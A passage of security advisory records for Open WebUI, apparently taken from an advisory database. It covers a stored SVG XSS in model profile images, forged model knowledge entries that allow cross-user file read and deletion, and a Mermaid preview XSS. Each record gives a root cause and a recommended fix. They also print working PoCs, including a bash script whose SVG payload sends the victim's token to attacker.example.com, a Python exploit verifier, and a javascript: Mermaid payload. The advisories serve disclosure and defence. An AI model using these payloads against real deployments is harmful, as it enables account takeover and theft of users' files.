Account Takeover via Model Profile Images ","description":"# Stored XSS to Account Takeover via Model Profile Images in Open WebUI\n\n**Affected:** Open WebUI \u003c= 0.9.5\n**Bypass of:** GHSA-3wgj-c2hg-vm6q, GHSA-3856-3vxq-m6fc\n\n---\n\n## TL;DR\n\nOpen WebUI patched SVG XSS in user profile images and webhook profile images  but forgot to apply the same fix to **model** profile images. The `ModelMeta` class has no `validate_profile_image_url` field validator, and the model image serving endpoint has no MIME allowlist or `nosniff` header. Any authenticated user with `workspace.models` permission (enabled by default) can store a `data:image/svg+xml;base64,...` payload in a model's profile image and achieve full account takeover of anyone who navigates to the image URL.\n\n---\n\n## Past of the issue\n\nIn early 2025, two security advisories landed for Open WebUI:\n\n- **GHSA-3wgj-c2hg-vm6q**  SVG XSS via user profile images\n- **GHSA-3856-3vxq-m6fc**  SVG XSS via webhook profile images\n\nThe patches were clean. A `validate_profile_image_url` function was introduced in `backend/open_webui/utils/validate.py`  a compiled regex that restricts `data:` URIs to safe raster formats (`image/png`, `image/jpeg`, `image/gif`, `image/webp`), explicitly excluding `image/svg+xml` because SVG can carry embedded `\u003cscript\u003e` tags. On the output side, `users.py` added a MIME allowlist check and `X-Content-Type-Options: nosniff`.\n\nThe fix was applied to `UserUpdateForm`, `UpdateProfileForm`, and later to `ChannelWebhookForm`. Three models patched. Case closed.\n\nExcept there was a fourth endpoint.\n\n## The Gap\n\nOpen WebUI has a concept of \"Models\"  user-created model configurations with metadata including a profile image. The metadata lives in `ModelMeta`:\n\n```python\n# backend/open_webui/models/models.py, line 37-47\nclass ModelMeta(BaseModel):\n    profile_image_url: Optional[str] = '/static/favicon.png'\n    description: Optional[str] = None\n    capabilities: Optional[dict] = None\n    model_config = ConfigDict(extra='allow')\n```\n\nNo `@field_validator`. No import of `validate_profile_image_url`. `ModelMeta` accepts any string as `profile_image_url`  including `data:image/svg+xml;base64,...`.\n\nThe serving endpoint at `GET /api/v1/models/model/profile/image` has the same gap:\n\n```python\n# backend/open_webui/routers/models.py, line 503-518\nelif profile_image_url.startswith('data:image'):\n    header, base64_data = profile_image_url.split(',', 1)\n    image_data = base64.b64decode(base64_data)\n    image_buffer = io.BytesIO(image_data)\n    media_type = header.split(';')[0].lstrip('data:')\n\n    headers = {'Content-Disposition': 'inline'}\n    # ...\n    return StreamingResponse(\n        image_buffer,\n        media_type=media_type,\n        headers=headers,\n    )\n```\n\nNo MIME allowlist. No `nosniff`. No CSP. The SVG is served inline with `Content-Type: image/svg+xml` on the application's origin.\n\nCompare this with the **patched** user endpoint:\n\n```python\n# backend/open_webui/routers/users.py, line 497-509\nmedia_type = header.split(';')[0].lstrip('data:').lower()\n\nif media_type not in PROFILE_IMAGE_ALLOWED_MIME_TYPES:   # \u003c-- ABSENT in models.py\n    return FileResponse(f'{STATIC_DIR}/user.png')\n\nreturn StreamingResponse(\n    image_buffer,\n    media_type=media_type,\n    headers={\n        'Content-Disposition': 'inline',\n        'X-Content-Type-Options': 'nosniff',             # \u003c-- ABSENT in models.py\n    },\n)\n```\n\nThe fix exists. It just was never applied here.\n\n## Comparison Table\n\n| Endpoint | Input Validation | MIME Allowlist | nosniff | Status |\n|----------|:---:|:---:|:---:|--------|\n| `GET /users/{id}/profile/image` | YES | YES | YES | **Patched** |\n| `GET /webhooks/{id}/profile/image` | YES | no | no | Partially patched |\n| `GET /models/model/profile/image` | **NO** | **NO** | **NO** | **Vulnerable** |\n\n## Three Write Vectors\n\nThe malicious SVG data URI can be injected through any of three endpoints  all pass `ModelForm` containing `ModelMeta` without validation:\n\n1. **`POST /api/v1/models/create`** (line 195)  any user with `workspace.models` permission\n2. **`POST /api/v1/models/update`** (line 581)  model owner or admin\n3. **`POST /api/v1/models/import`** (line 279)  admin only\n\nThe `workspace.models` permission is **enabled by default** for all non-pending users in a standard deployment.\n\n## The Attack\n\n**Step 1  Store the payload:**\n\n```bash\nSVG=$(echo '\u003csvg xmlns=\"http://www.w3.org/2000/svg\"\u003e\n  \u003cscript\u003e\n    new Image().src=\"https://attacker.example.com/steal?t=\"+localStorage.getItem(\"token\")\n  \u003c/script\u003e\n\u003c/svg\u003e' | base64 -w0)\n\ncurl -s -X POST 'https://TARGET/api/v1/models/create' \\\n  -H \"Authorization: Bearer $ATTACKER_TOKEN\" \\\n  -H 'Content-Type: application/json' \\\n  -d \"{\n    \\\"id\\\": \\\"gpt-4-turbo-preview\\\",\n    \\\"name\\\": \\\"GPT-4 Turbo\\\",\n    \\\"base_model_id\\\": \\\"gpt-4\\\",\n    \\\"meta\\\": {\n      \\\"profile_image_url\\\": \\\"data:image/svg+xml;base64,$SVG\\\",\n      \\\"description\\\": \\\"Latest GPT-4 Turbo model\\\"\n    },\n    \\\"params\\\": {},\n    \\\"access_grants\\\": []\n  }\"\n```\n\n**Step 2  Victim navigates to the image URL:**\n\n```\nhttps://TARGET/api/v1/models/model/profile/image?id=gpt-4-turbo-preview\n```\n\nThis happens naturally when a user right-clicks a model's avatar and selects \"Open Image in New Tab\", or when the attacker sends the URL directly (e.g., in a channel message).\n\n**Step 3  Token theft:**\n\nThe server responds:\n\n```http\nHTTP/1.1 200 OK\ncontent-type: image/svg+xml\ncontent-disposition: inline\n\n\u003csvg xmlns=\"http://www.w3.org/2000/svg\"\u003e\n  \u003cscript\u003e\n    new Image().src=\"https://attacker.example.com/steal?t=\"+localStorage.getItem(\"token\")\n  \u003c/script\u003e\n\u003c/svg\u003e\n```\n\nNo `X-Content-Type-Options`. No `Content-Security-Policy`. The browser renders the SVG as a top-level document in the Open WebUI origin. The embedded `\u003cscript\u003e` executes. `localStorage.getItem(\"token\")` returns the victim's JWT. The attacker receives it and has full API access  password changes, admin promotion, data exfiltration.\n\n## PoC\n\n```bash\n#!/usr/bin/env bash\n# PoC: Stored SVG XSS -\u003e token theft via Open WebUI model profile image\n# Affected: open-webui \u003c= 0.9.5\n\nTARGET=\"http://localhost:8080\"\nATTACKER_TOKEN=\"\u003cattacker_JWT_from_localStorage.token\u003e\"\nCOLLECTOR=\"https://attacker.example.com/steal\"   # attacker-controlled listener\n\n# --- Step 1: Build the malicious SVG (steals victim JWT from localStorage) ---\nread -r -d '' SVG \u003c\u003cEOF\n\u003csvg xmlns=\"http://www.w3.org/2000/svg\"\u003e\n  \u003cscript\u003e\n    new Image().src=\"${COLLECTOR}?t=\"+encodeURIComponent(localStorage.getItem(\"token\"));\n  \u003c/script\u003e\n\u003c/svg\u003e\nEOF\nSVG_B64=$(printf '%s' \"$SVG\" | base64 -w0)\n\n# --- Step 2: Store the payload in a model's profile_image_url ---\ncurl -s -X POST \"${TARGET}/api/v1/models/create\" \\\n  -H \"Authorization: Bearer ${ATTACKER_TOKEN}\" \\\n  -H \"Content-Type: application/json\" \\\n  -d \"{\n    \\\"id\\\": \\\"gpt-4-turbo-preview\\\",\n    \\\"name\\\": \\\"GPT-4 Turbo\\\",\n    \\\"base_model_id\\\": \\\"gpt-4\\\",\n    \\\"meta\\\": {\n      \\\"profile_image_url\\\": \\\"data:image/svg+xml;base64,${SVG_B64}\\\",\n      \\\"description\\\": \\\"Latest GPT-4 Turbo\\\"\n    },\n    \\\"params\\\": {},\n    \\\"access_grants\\\": []\n  }\"\n\n# --- Step 3: Trigger (victim navigates here, or attacker sends the link) ---\necho \"Victim opens:  ${TARGET}/api/v1/models/model/profile/image?id=gpt-4-turbo-preview\"\n```\n\nExpected server response at Step 3 (the proof — SVG served inline, no defenses):\n\n```\nHTTP/1.1 200 OK\ncontent-type: image/svg+xml\ncontent-disposition: inline\n\n\u003csvg xmlns=\"http://www.w3.org/2000/svg\"\u003e\n  \u003cscript\u003enew Image().src=\"https://attacker.example.com/steal?t=\"+localStorage.getItem(\"token\")\u003c/script\u003e\n\u003c/svg\u003e\n````\nNo X-Content-Type-Options, no Content-Security-Policy. The browser renders the SVG as a top-level document, the \u003cscript\u003e executes in the Open WebUI origin, and the victim's JWT lands in the attacker's collector log. The attacker replays the JWT against the API for full account takeover (password change, admin promotion).\n\nTrigger note: because the frontend loads model avatars in `\u003cimg src=...\u003e` context (where SVG scripts do not run), exploitation requires the victim to load the URL as a top-level document — e.g. right-click → \"Open image in new tab\", or clicking the raw link when the attacker pastes it into a channel/chat. That single click is the only user interaction needed.\n\n## Root Cause\n\nAn incomplete patch. When GHSA-3wgj-c2hg-vm6q was fixed, the validator was added to `UserUpdateForm` and `UpdateProfileForm`. When GHSA-3856-3vxq-m6fc was fixed, it was added to `ChannelWebhookForm`. But `ModelMeta`  which uses the same `profile_image_url` field with the same serving logic  was never touched. The output-side defenses (MIME allowlist + `nosniff`) were also only added to `users.py`, not to `models.py` or `channels.py`.\n\n## Recommended Fix\n\n**Input side**  add the validator to `ModelMeta`:\n\n```python\n# backend/open_webui/models/models.py\nfrom open_webui.utils.validate import validate_profile_image_url\n\nclass ModelMeta(BaseModel):\n    profile_image_url: Optional[str] = '/static/favicon.png'\n    # ...\n\n    @field_validator('profile_image_url', mode='before')\n    @classmethod\n    def check_profile_image_url(cls, v):\n        if v is None:\n            return v\n        return validate_profile_image_url(v)\n```\n\n**Output side**  add MIME check and nosniff to the serving endpoint:\n\n```python\n# backend/open_webui/routers/models.py\nmedia_type = header.split(';')[0].lstrip('data:').lower()\n\nif media_type not in PROFILE_IMAGE_ALLOWED_MIME_TYPES:\n    return FileResponse(f'{STATIC_DIR}/favicon.png')\n\nreturn StreamingResponse(\n    image_buffer,\n    media_type=media_type,\n    headers={\n        'Content-Disposition': 'inline',\n        'X-Content-Type-Options': 'nosniff',\n    },\n)\n```\n\nBoth layers are necessary  input validation prevents storage, output validation prevents serving even if a bypass is found later.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-06-17T14:15:52.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.6,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N","references":["https://github.com/open-webui/open-webui/security/advisories/GHSA-v2qm-5wxj-qhj7","https://nvd.nist.gov/vuln/detail/CVE-2026-54013","https://github.com/advisories/GHSA-v2qm-5wxj-qhj7","https://github.com/open-webui/open-webui","https://github.com/pypa/advisory-database/tree/main/vulns/open-webui/PYSEC-2026-2757.yaml","https://pypi.org/project/open-webui"],"source_kind":"github","identifiers":["GHSA-v2qm-5wxj-qhj7","CVE-2026-54013"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-06-17T15:00:08.452Z","updated_at":"2026-09-03T03:02:03.258Z","epss_percentage":0.003,"epss_percentile":0.22051,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS12MnFtLTV3eGotcWhqN84ABY4h","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS12MnFtLTV3eGotcWhqN84ABY4h","packages":[{"ecosystem":"pypi","package_name":"open-webui","versions":[{"first_patched_version":"0.9.6","vulnerable_version_range":"\u003c= 0.9.5"}],"purl":"pkg:pypi/open-webui"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS12MnFtLTV3eGotcWhqN84ABY4h/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS12anFtLTZnY2MtNjJjcs4ABY4g","url":"https://github.com/advisories/GHSA-vjqm-6gcc-62cr","title":"Open WebUI: Forged model meta.knowledge allows cross-user file read and deletion","description":"## Summary\n\nOpen WebUI lets a user who can create, update, or import workspace models store arbitrary `meta.knowledge` entries on their model without checking whether they own or can read the referenced files. Open WebUI then treats `meta.knowledge` entries of type `file` as an authorization source in two places: the built-in `view_file` tool reads the file's extracted text, and `has_access_to_file()`'s model branch authorizes the file content and file delete endpoints. A malicious model owner can therefore attach another user's file ID to their model metadata and read or delete that private file.\n\n## Impact\n\nSecurity boundary crossed: file confidentiality and integrity.\n\nAn authenticated attacker needs the `workspace.models` or `workspace.models_import` permission (or write access to an existing model) and a victim file ID. With those, for a file they do not own and cannot otherwise read, the attacker can:\n\n- read the file's extracted text (up to `100000` characters per `view_file` call from `file.data.content`),\n- read the file's content via `GET /api/v1/files/{id}/content`, and\n- delete the file via `DELETE /api/v1/files/{id}`.\n\n## Root Cause\n\n`ModelMeta` allows extra metadata fields and `ModelForm` accepts that metadata without a validator for `meta.knowledge` file access:\n\n```python\n# backend/open_webui/models/models.py\nclass ModelForm(BaseModel):\n    model_config = ConfigDict(extra='ignore')\n\n    id: str\n    base_model_id: Optional[str] = None\n    name: str\n    meta: ModelMeta\n    params: ModelParams\n```\n\nModel creation only checks the caller's model-workspace permission and then stores the form data:\n\n```python\n# backend/open_webui/routers/models.py\nif user.role != 'admin' and not await has_permission(\n    user.id, 'workspace.models', request.app.state.config.USER_PERMISSIONS, db=db\n):\n    raise HTTPException(...)\n\nmodel = await Models.insert_new_model(form_data, user.id, db=db)\n```\n\nThe insert sink persists the supplied `meta`:\n\n```python\n# backend/open_webui/models/models.py\nresult = Model(\n    **{\n        **form_data.model_dump(exclude={'access_grants'}),\n        'user_id': user_id,\n        ...\n    }\n)\n```\n\nWhen built-in tools are assembled, `meta.knowledge` is passed through as `__model_knowledge__`, and any `file` entry enables `view_file`:\n\n```python\n# backend/open_webui/utils/tools.py\nmodel_knowledge = model.get('info', {}).get('meta', {}).get('knowledge', [])\n...\nknowledge_types = {item.get('type') for item in model_knowledge}\nif 'file' in knowledge_types or 'collection' in knowledge_types:\n    builtin_functions.append(view_file)\n```\n\n`view_file` treats matching `__model_knowledge__` file IDs as authorization, before `has_access_to_file()`:\n\n```python\n# backend/open_webui/tools/builtin.py\nif (\n    file.user_id != user_id\n    and user_role != 'admin'\n    and not any(\n        item.get('type') == 'file' and item.get('id') == file_id for item in (__model_knowledge__ or [])\n    )\n    and not await has_access_to_file(...)\n):\n    return json.dumps({'error': 'File not found'})\n```\n\nThe same forged `meta.knowledge` is also trusted outside the tool path. `has_access_to_file()` iterates the caller's accessible models and returns true when a model's `meta.knowledge` contains the requested file ID:\n\n```python\n# backend/open_webui/utils/access_control/files.py\nfor model in await Models.get_models_by_user_id(user.id, permission=access_type, db=db):\n    knowledge_items = getattr(model.meta, 'knowledge', None) or []\n    for item in knowledge_items:\n        if isinstance(item, dict) and item.get('type') == 'file' and item.get('id') == file.id:\n            return True\n```\n\nThis branch is not restricted to read, so it also satisfies the `write` check that `DELETE /api/v1/files/{id}` performs. The same missing validation applies to the import path (`POST /api/v1/models/import`) and the update path, not only create.\n\n## PoC\n\n```python\n#!/usr/bin/env python3\n\"\"\"\nVerifier for forged model meta.knowledge file entries reaching builtin tools.\n\nThe proof executes:\n  - the real Models.insert_new_model() sink with a forged meta.knowledge entry\n  - the real builtin view_file() authorization branch\n\nFake DB/model adapters are used only to avoid requiring a live Open WebUI\nserver. The security-sensitive code under test is Open WebUI application code.\n\"\"\"\n\nfrom __future__ import annotations\n\nimport asyncio\nimport ast\nimport json\nimport os\nimport sys\nimport types\nfrom pathlib import Path\nfrom types import SimpleNamespace\n\nREPO = Path(__file__).resolve().parents[1]\nBUILTIN_TOOLS = REPO / \"backend/open_webui/tools/builtin.py\"\n\n\ndef prepare_imports() -\u003e None:\n    sys.path.insert(0, str(REPO / \"backend\"))\n    os.environ[\"VECTOR_DB\"] = \"none\"\n\n    class DummyTyper:\n        def command(self, *args, **kwargs):\n            return lambda fn: fn\n\n    sys.modules.setdefault(\n        \"typer\",\n        types.SimpleNamespace(\n            Typer=lambda *args, **kwargs: DummyTyper(),\n            Option=lambda *args, **kwargs: None,\n            echo=lambda *args, **kwargs: None,\n            Exit=Exception,\n        ),\n    )\n    sys.modules.setdefault(\"uvicorn\", types.SimpleNamespace(run=lambda *args, **kwargs: None))\n\n\nclass FakeDb:\n    def __init__(self):\n        self.added = []\n        self.committed = False\n        self.refreshed = False\n\n    def add(self, row):\n        self.added.append(row)\n\n    async def commit(self):\n        self.committed = True\n\n    async def refresh(self, row):\n        self.refreshed = True\n\n\nclass FakeDbContext:\n    def __init__(self, db):\n        self.db = db\n\n    async def __aenter__(self):\n        return self.db\n\n    async def __aexit__(self, exc_type, exc, tb):\n        return False\n\n\nasync def verify_model_insert_accepts_victim_file(victim_file_id: str):\n    import open_webui.models.models as models_module\n\n    fake_db = FakeDb()\n    original_context = models_module.get_async_db_context\n    original_set_grants = models_module.AccessGrants.set_access_grants\n    original_to_model = models_module.Models._to_model_model\n\n    async def fake_set_access_grants(*args, **kwargs):\n        return True\n\n    async def fake_to_model(self, model, access_grants=None, db=None):\n        return SimpleNamespace(\n            id=model.id,\n            user_id=model.user_id,\n            base_model_id=model.base_model_id,\n            name=model.name,\n            params=model.params,\n            meta=model.meta,\n            access_grants=[],\n            is_active=model.is_active,\n            created_at=model.created_at,\n            updated_at=model.updated_at,\n        )\n\n    try:\n        models_module.get_async_db_context = lambda db=None: FakeDbContext(fake_db)\n        models_module.AccessGrants.set_access_grants = fake_set_access_grants\n        models_module.Models._to_model_model = types.MethodType(fake_to_model, models_module.Models)\n\n        inserted = await models_module.Models.insert_new_model(\n            models_module.ModelForm(\n                id=\"attacker-model\",\n                base_model_id=\"gpt-vision-base\",\n                name=\"Attacker Model\",\n                params={},\n                meta={\n                    \"knowledge\": [\n                        {\n                            \"id\": victim_file_id,\n                            \"type\": \"file\",\n                            \"name\": \"victim-private.txt\",\n                        }\n                    ],\n                    \"builtinTools\": {\"knowledge\": True},\n                },\n            ),\n            user_id=\"attacker\",\n        )\n    finally:\n        models_module.get_async_db_context = original_context\n        models_module.AccessGrants.set_access_grants = original_set_grants\n        models_module.Models._to_model_model = original_to_model\n\n    stored_meta = [getattr(row, \"meta\", None) for row in fake_db.added]\n    stored_knowledge_ids = [\n        item.get(\"id\")\n        for meta in stored_meta\n        for item in ((meta or {}).get(\"knowledge\") or [])\n    ]\n\n    return {\n        \"insert_returned_model\": bool(inserted),\n        \"db_commit_called\": fake_db.committed,\n        \"stored_user_ids\": [getattr(row, \"user_id\", None) for row in fake_db.added],\n        \"stored_model_ids\": [getattr(row, \"id\", None) for row in fake_db.added],\n        \"stored_knowledge_file_ids\": stored_knowledge_ids,\n    }\n\n\nasync def verify_view_file_trusts_model_knowledge(victim_file_id: str):\n    class FakeFiles:\n        looked_up_ids = []\n\n        async def get_file_by_id(self, file_id, db=None):\n            self.looked_up_ids.append(file_id)\n            if file_id == victim_file_id:\n                return SimpleNamespace(\n                    id=victim_file_id,\n                    user_id=\"victim\",\n                    filename=\"victim-private.txt\",\n                    data={\"content\": \"PRIVATE_MODEL_KNOWLEDGE_SECRET\"},\n                    created_at=1,\n                    updated_at=2,\n                )\n            return None\n\n    async def fake_has_access_to_file(file_id, access_type, user, db=None):\n        return False\n\n    class FakeUserModel:\n        def __init__(self, **kwargs):\n            self.__dict__.update(kwargs)\n\n    fake_files = FakeFiles()\n    fake_files_module = types.SimpleNamespace(Files=fake_files)\n    fake_file_acl_module = types.SimpleNamespace(has_access_to_file=fake_has_access_to_file)\n\n    original_files_module = sys.modules.get(\"open_webui.models.files\")\n    original_acl_module = sys.modules.get(\"open_webui.utils.access_control.files\")\n\n    try:\n        sys.modules[\"open_webui.models.files\"] = fake_files_module\n        sys.modules[\"open_webui.utils.access_control.files\"] = fake_file_acl_module\n\n        source = BUILTIN_TOOLS.read_text(encoding=\"utf-8\")\n        tree = ast.parse(source, filename=str(BUILTIN_TOOLS))\n        selected = [\n            node\n            for node in tree.body\n            if isinstance(node, ast.AsyncFunctionDef) and node.name == \"view_file\"\n        ]\n        if len(selected) != 1:\n            raise RuntimeError(\"could not find view_file\")\n        module = ast.Module(body=selected, type_ignores=[])\n        ast.fix_missing_locations(module)\n        ns = {\n            \"json\": json,\n            \"Optional\": __import__(\"typing\").Optional,\n            \"Request\": object,\n            \"UserModel\": FakeUserModel,\n            \"log\": SimpleNamespace(exception=lambda *args, **kwargs: None),\n            \"MAX_VIEW_FILE_CHARS\": 100_000,\n            \"DEFAULT_VIEW_FILE_MAX_CHARS\": 10_000,\n        }\n        exec(compile(module, str(BUILTIN_TOOLS), \"exec\"), ns)\n        view_file = ns[\"view_file\"]\n\n        denied_without_model_knowledge = await view_file(\n            victim_file_id,\n            __request__=SimpleNamespace(),\n            __user__={\"id\": \"attacker\", \"role\": \"user\", \"name\": \"attacker\", \"email\": \"a@example.test\"},\n            __model_knowledge__=[],\n        )\n        allowed_with_model_knowledge = await view_file(\n            victim_file_id,\n            __request__=SimpleNamespace(),\n            __user__={\"id\": \"attacker\", \"role\": \"user\", \"name\": \"attacker\", \"email\": \"a@example.test\"},\n            __model_knowledge__=[{\"id\": victim_file_id, \"type\": \"file\"}],\n        )\n    finally:\n        if original_files_module is not None:\n            sys.modules[\"open_webui.models.files\"] = original_files_module\n        else:\n            sys.modules.pop(\"open_webui.models.files\", None)\n        if original_acl_module is not None:\n            sys.modules[\"open_webui.utils.access_control.files\"] = original_acl_module\n        else:\n            sys.modules.pop(\"open_webui.utils.access_control.files\", None)\n\n    denied = json.loads(denied_without_model_knowledge)\n    allowed = json.loads(allowed_with_model_knowledge)\n    return {\n        \"file_ids_looked_up\": fake_files.looked_up_ids,\n        \"without_model_knowledge\": denied,\n        \"with_forged_model_knowledge\": allowed,\n        \"private_content_disclosed\": allowed.get(\"content\") == \"PRIVATE_MODEL_KNOWLEDGE_SECRET\",\n    }\n\n\nasync def main() -\u003e None:\n    prepare_imports()\n    victim_file_id = \"victim-private-file\"\n\n    insert_sink = await verify_model_insert_accepts_victim_file(victim_file_id)\n    tool_read = await verify_view_file_trusts_model_knowledge(victim_file_id)\n\n    result = {\n        \"confirmed\": (\n            insert_sink[\"insert_returned_model\"] is True\n            and insert_sink[\"stored_user_ids\"] == [\"attacker\"]\n            and insert_sink[\"stored_knowledge_file_ids\"] == [victim_file_id]\n            and tool_read[\"without_model_knowledge\"].get(\"error\") == \"File not found\"\n            and tool_read[\"private_content_disclosed\"] is True\n        ),\n        \"attacker_user_id\": \"attacker\",\n        \"victim_user_id\": \"victim\",\n        \"victim_file_id\": victim_file_id,\n        \"attacker_owns_file\": False,\n        \"model_insert_sink\": insert_sink,\n        \"tool_read\": tool_read,\n        \"source\": {\n            \"insert_sink\": \"backend/open_webui/models/models.py:Models.insert_new_model\",\n            \"tool_injection\": \"backend/open_webui/utils/tools.py:get_builtin_tools passes model meta.knowledge as __model_knowledge__\",\n            \"read_sink\": \"backend/open_webui/tools/builtin.py:view_file\",\n        },\n    }\n    print(json.dumps(result, indent=2, sort_keys=True))\n    if not result[\"confirmed\"]:\n        raise SystemExit(1)\n\n\nif __name__ == \"__main__\":\n    asyncio.run(main())\n```\n\nThe PoC executes the real `Models.insert_new_model()` sink and the real `view_file()` authorization branch with fake database/file adapters. It first confirms that the attacker-owned model stores a forged victim file ID in `meta.knowledge`, then confirms `view_file()` denies the same victim file without model knowledge but discloses content when the forged model knowledge entry is present.\n\nResult:\n\n```json\n{\n  \"attacker_owns_file\": false,\n  \"attacker_user_id\": \"attacker\",\n  \"confirmed\": true,\n  \"model_insert_sink\": {\n    \"db_commit_called\": true,\n    \"insert_returned_model\": true,\n    \"stored_knowledge_file_ids\": [\n      \"victim-private-file\"\n    ],\n    \"stored_model_ids\": [\n      \"attacker-model\"\n    ],\n    \"stored_user_ids\": [\n      \"attacker\"\n    ]\n  },\n  \"tool_read\": {\n    \"private_content_disclosed\": true,\n    \"with_forged_model_knowledge\": {\n      \"content\": \"PRIVATE_MODEL_KNOWLEDGE_SECRET\",\n      \"filename\": \"victim-private.txt\",\n      \"id\": \"victim-private-file\"\n    },\n    \"without_model_knowledge\": {\n      \"error\": \"File not found\"\n    }\n  },\n  \"victim_file_id\": \"victim-private-file\",\n  \"victim_user_id\": \"victim\"\n}\n```\n\n## Exploit Sketch\n\n1. Attacker has permission to create or update workspace models.\n2. Attacker creates a model with:\n\n```json\n{\n  \"meta\": {\n    \"knowledge\": [\n      {\n        \"id\": \"VICTIM_FILE_ID\",\n        \"type\": \"file\",\n        \"name\": \"victim-private.txt\"\n      }\n    ],\n    \"builtinTools\": {\n      \"knowledge\": true\n    }\n  }\n}\n```\n\n3. Attacker chats with that model using native/built-in tools and invokes `view_file` for `VICTIM_FILE_ID`.\n4. The tool returns the victim file's extracted text content despite the attacker not owning or otherwise having access to the file.\n\n## Recommended Fix\n\nValidate `meta.knowledge` on every model write path: create, update, and import. For entries with `type == \"file\"`, require direct ownership, admin role, or `has_access_to_file(file_id, 'read', user, db=db)` before storing the entry. Validate the import payload before its surrounding try/except so a rejection surfaces as `403`, not `500`.\n\nDo not let `view_file()` treat `__model_knowledge__` as an authorization bypass; it should still enforce ownership/admin/`has_access_to_file()` per file ID. File deletion should require ownership, admin, or explicit write/delete access, not a read-derived model association.\n\n## Consolidation\n\nPer our Report Handling policy this consolidates independent reports of the same model `meta.knowledge` file-ID laundering flaw:\n\n- Read via forged `meta.knowledge` on model create, through the built-in `view_file` tool: @0xEr3n (earliest filing).\n- Distinct paths demonstrated by @5yu4n: the import endpoint (`POST /api/v1/models/import`), and cross-user read and deletion through the file API (`GET` / `DELETE /api/v1/files/{id}`) via `has_access_to_file()`'s model branch.\n\nFix validates `meta.knowledge` ownership on create, update, and import; blocking the forged entry closes both read and delete. One CVE for the consolidated advisory.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-06-17T14:15:33.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.1,"cvss_vector":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:L","references":["https://github.com/open-webui/open-webui/security/advisories/GHSA-vjqm-6gcc-62cr","https://nvd.nist.gov/vuln/detail/CVE-2026-54012","https://github.com/advisories/GHSA-vjqm-6gcc-62cr","https://github.com/open-webui/open-webui","https://github.com/pypa/advisory-database/tree/main/vulns/open-webui/PYSEC-2026-2761.yaml","https://pypi.org/project/open-webui"],"source_kind":"github","identifiers":["GHSA-vjqm-6gcc-62cr","CVE-2026-54012"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-06-17T15:00:08.452Z","updated_at":"2026-09-03T03:02:23.439Z","epss_percentage":0.00325,"epss_percentile":0.2474,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS12anFtLTZnY2MtNjJjcs4ABY4g","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS12anFtLTZnY2MtNjJjcs4ABY4g","packages":[{"ecosystem":"pypi","package_name":"open-webui","versions":[{"first_patched_version":"0.9.6","vulnerable_version_range":"\u003c= 0.9.5"}],"purl":"pkg:pypi/open-webui"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS12anFtLTZnY2MtNjJjcs4ABY4g/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS12OHFqLWh4djctbWd2ds4ABY4f","url":"https://github.com/advisories/GHSA-v8qj-hxv7-mgvv","title":"Open WebUI: Stored XSS in Mermaid Markdown Preview","description":"## Summary\n\nOpen WebUI renders Mermaid blocks from Markdown files in the file preview panel and inserts the generated SVG into the DOM using `innerHTML`.\n\nBecause Mermaid is configured with `securityLevel: 'loose'`, attacker-controlled Mermaid content can be rendered unsafely in this flow. A working payload was validated through the Markdown preview path, resulting in JavaScript execution in the victim’s browser under the application origin.\n\nThis is a confirmed stored XSS vulnerability reachable through normal product functionality.\n\n## Affected Version\n\n- `main`\n- Reproduced on `v0.8.12`\n\n## Affected Code\n\nMermaid is initialized in permissive mode:\n\nhttps://github.com/open-webui/open-webui/blob/9bd84258d09eefe7bf975878fb0e31a5dadfe0f8/src/lib/utils/index.ts#L1698\nThe file preview path renders Mermaid output and injects the returned SVG into the DOM:\n\nhttps://github.com/open-webui/open-webui/blob/9bd84258d09eefe7bf975878fb0e31a5dadfe0f8/src/lib/components/chat/FileNav/FilePreview.svelte#L133\n\n## Impact\n\nA successful exploit allows JavaScript execution in the victim’s browser under the Open WebUI origin when a malicious Markdown file is opened in the preview panel.\n\n## PoC\n\nA malicious `.md` file containing the follwowing contents can be used to trigger the bug:\n````\n```mermaid\nflowchart LR\n  A[click me]\n  click A href \"javascript:alert(document.domain)\" \"x\"\n```\n````\nSteps to reproduce: \n1- Create a new chat \n2- Enable Code Interpreter and browse and upload the file with `.md` extension. \n\u003cimg width=\"331\" height=\"258\" alt=\"image\" src=\"https://github.com/user-attachments/assets/bce2b754-56d1-4da1-90a9-22bcb93269f2\" /\u003e\n3- Clicking on the file, and clicking `click me` should pop an alert\n\u003cimg width=\"1103\" height=\"485\" alt=\"image\" src=\"https://github.com/user-attachments/assets/18754486-799b-434e-a2fc-dd7c09956a29\" /\u003e\n \n\n## Remediation\n\nSince `mermaid` has `DOMPurify` as a built-in, it is recommended to use the `strict` mode instead of 